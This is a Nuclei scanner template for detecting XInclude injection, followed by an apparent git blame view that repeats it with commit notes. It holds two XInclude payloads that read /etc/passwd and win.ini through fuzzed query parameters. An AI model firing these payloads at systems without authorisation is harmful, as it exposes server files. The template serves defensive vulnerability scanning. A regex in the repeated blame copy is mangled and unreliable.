nuclei-templates/dast/vulnerabilities/xinclude-injection.yaml

id: xinclude-injection

info:
  name: XInclude Injection - Detection
  author: DhiyaneshDK,ritikchaddha
  severity: high
  description: |
    XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.
  reference:
    - https://d0pt3x.gitbook.io/passion/webapp-security/xxe-attacks/xinclude-attacks
  tags: dast,xxe,xinclude

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      xinc_fuzz:
        - '<asd xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></asd>'
        - '<asd xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///c:/windows/win.ini"/></asd>'

    fuzzing:
      - part: query
        type: replace # replaces existing parameter value with fuzz payload
        mode: multiple # replaces all parameters value with fuzz payload
        fuzz:
          - '{{xinc_fuzz}}'

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: regex
        name: linux
        part: body
        regex:
          - 'root:.*?:[0-9]*:[0-9]*:'

      - type: word
        name: windows
        part: body
        words:
          - 'for 16-bit app support'
Update and rename csv-injection.yaml to xinclude-injection.yaml 2024-07-02 04:13:21 +00:00			`id: xinclude-injection`
Create csv-injection.yaml 2024-07-01 12:05:37 +00:00
			`info:`
Update and rename csv-injection.yaml to xinclude-injection.yaml 2024-07-02 04:13:21 +00:00			`name: XInclude Injection - Detection`
Create csv-injection.yaml 2024-07-01 12:05:37 +00:00			`author: DhiyaneshDK,ritikchaddha`
			`severity: high`
			`description: \|`
			`XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.`
			`reference:`
			`- https://d0pt3x.gitbook.io/passion/webapp-security/xxe-attacks/xinclude-attacks`
			`tags: dast,xxe,xinclude`

			`http:`
			`- pre-condition:`
			`- type: dsl`
			`dsl:`
			`- 'method == "GET"'`

			`payloads:`
			`xinc_fuzz:`
			`- '<asd xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></asd>'`
			`- '<asd xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///c:/windows/win.ini"/></asd>'`

			`fuzzing:`
			`- part: query`
			`type: replace # replaces existing parameter value with fuzz payload`
			`mode: multiple # replaces all parameters value with fuzz payload`
			`fuzz:`
			`- '{{xinc_fuzz}}'`

			`stop-at-first-match: true`
			`matchers-condition: or`
			`matchers:`
			`- type: regex`
			`name: linux`
			`part: body`
			`regex:`
			`- 'root:.?:[0-9]:[0-9]*:'`

			`- type: word`
			`name: windows`
			`part: body`
			`words:`
			`- 'for 16-bit app support'`